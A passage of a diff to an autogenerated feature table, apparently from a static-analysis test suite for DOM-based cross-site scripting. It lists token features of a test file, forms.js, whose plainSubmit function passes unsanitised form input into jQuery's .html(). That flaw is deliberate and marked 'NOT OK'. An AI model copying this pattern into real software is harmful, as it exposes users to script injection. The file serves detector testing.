autogenerated/Xss/XssThroughDom/forms.js:49:23:49:34 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:49:23:49:34 | handleSubmit | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:49:23:49:34 | handleSubmit | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:49:23:49:34 | handleSubmit | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:49:23:49:34 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:49:37:50:8 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:49:37:50:8 | \\n | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:49:37:50:8 | \\n | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:49:37:50:8 | \\n | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:49:37:50:8 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:9:50:49 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:9:50:49 | | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:50:9:50:49 | | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:9:50:49 | | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:9:50:49 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:10:50:14 | input | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:10:50:14 | input | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:50:10:50:14 | input | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:10:50:14 | input | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:10:50:14 | input | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:19 | type | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:19 | type | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:19 | type | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:19 | type | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:19 | type | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:16:50:26 | type="text" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:21:50:26 | "text" | assignedToPropName | type | +| autogenerated/Xss/XssThroughDom/forms.js:50:21:50:26 | "text" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:21:50:26 | "text" | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:50:21:50:26 | "text" | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:21:50:26 | "text" | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:21:50:26 | "text" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:31 | name | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:31 | name | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:31 | name | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:31 | name | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:31 | name | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:28:50:40 | name="stooge" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:33:50:40 | "stooge" | assignedToPropName | name | +| autogenerated/Xss/XssThroughDom/forms.js:50:33:50:40 | "stooge" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:33:50:40 | "stooge" | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:50:33:50:40 | "stooge" | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:33:50:40 | "stooge" | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:33:50:40 | "stooge" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:50:50:51:6 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:50:50:51:6 | \\n | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:50:50:51:6 | \\n | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:50:50:51:6 | \\n | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:50:50:51:6 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:56:0 | this | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:56:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:56:0 | this | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:56:0 | this | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:56:0 | this | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | 'arguments' object of function plainSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | 'arguments' object of function plainSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | 'arguments' object of function plainSubmit | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | 'arguments' object of function plainSubmit | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | 'arguments' object of function plainSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | exceptional return of function plainSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | exceptional return of function plainSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | exceptional return of function plainSubmit | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | exceptional return of function plainSubmit | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | exceptional return of function plainSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | functio ... OT OK\\n} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | functio ... OT OK\\n} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | return of function plainSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | return of function plainSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | return of function plainSubmit | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | return of function plainSubmit | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:56:1:58:1 | return of function plainSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:10:56:20 | plainSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:10:56:20 | plainSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:10:56:20 | plainSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:56:10:56:20 | plainSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:56:10:56:20 | plainSubmit | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:56:10:56:20 | plainSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:10:56:20 | plainSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:56:22:56:22 | e | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:5 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:5 | $ | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:5 | $ | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:5 | $ | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:5 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | $("#id") | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | $("#id") | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | $("#id") | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | exceptional return of $("#id") | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | exceptional return of $("#id") | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:12 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:17 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:17 | $("#id").html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:17 | $("#id").html | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:17 | $("#id").html | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:17 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | $("#id" ... .value) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | $("#id" ... .value) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | $("#id" ... .value) | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | $("#id" ... .value) | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | $("#id" ... .value) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | exceptional return of $("#id" ... .value) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | exceptional return of $("#id" ... .value) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | exceptional return of $("#id" ... .value) | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | exceptional return of $("#id" ... .value) | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:5:57:33 | exceptional return of $("#id" ... .value) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:57:7:57:11 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/XssThroughDom/forms.js:57:7:57:11 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:57:7:57:11 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24383,6 +160178,21 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:57:7:57:11 | "#id" | enclosingFunctionBody | e $ #id html e target value | | autogenerated/Xss/XssThroughDom/forms.js:57:7:57:11 | "#id" | enclosingFunctionName | plainSubmit | | autogenerated/Xss/XssThroughDom/forms.js:57:7:57:11 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:14:57:17 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:14:57:17 | html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:14:57:17 | html | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:14:57:17 | html | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:14:57:17 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:19 | e | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:19 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:19 | e | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:19 | e | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:19 | e | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:26 | e.target | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:26 | e.target | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:26 | e.target | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:26 | e.target | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:19:57:26 | e.target | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:57:19:57:32 | e.target.value | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:57:19:57:32 | e.target.value | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:57:19:57:32 | e.target.value | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24390,6 +160200,518 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:57:19:57:32 | e.target.value | enclosingFunctionBody | e $ #id html e target value | | autogenerated/Xss/XssThroughDom/forms.js:57:19:57:32 | e.target.value | enclosingFunctionName | plainSubmit | | autogenerated/Xss/XssThroughDom/forms.js:57:19:57:32 | e.target.value | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:21:57:26 | target | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:21:57:26 | target | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:21:57:26 | target | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:21:57:26 | target | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:21:57:26 | target | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:57:28:57:32 | value | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:57:28:57:32 | value | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/XssThroughDom/forms.js:57:28:57:32 | value | enclosingFunctionBody | e $ #id html e target value | +| autogenerated/Xss/XssThroughDom/forms.js:57:28:57:32 | value | enclosingFunctionName | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:57:28:57:32 | value | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:60:7:60:16 | plainReact | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:60:7:60:16 | plainReact | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:60:7:60:16 | plainReact | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:60:7:65:1 | plainRe ... form>\\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| 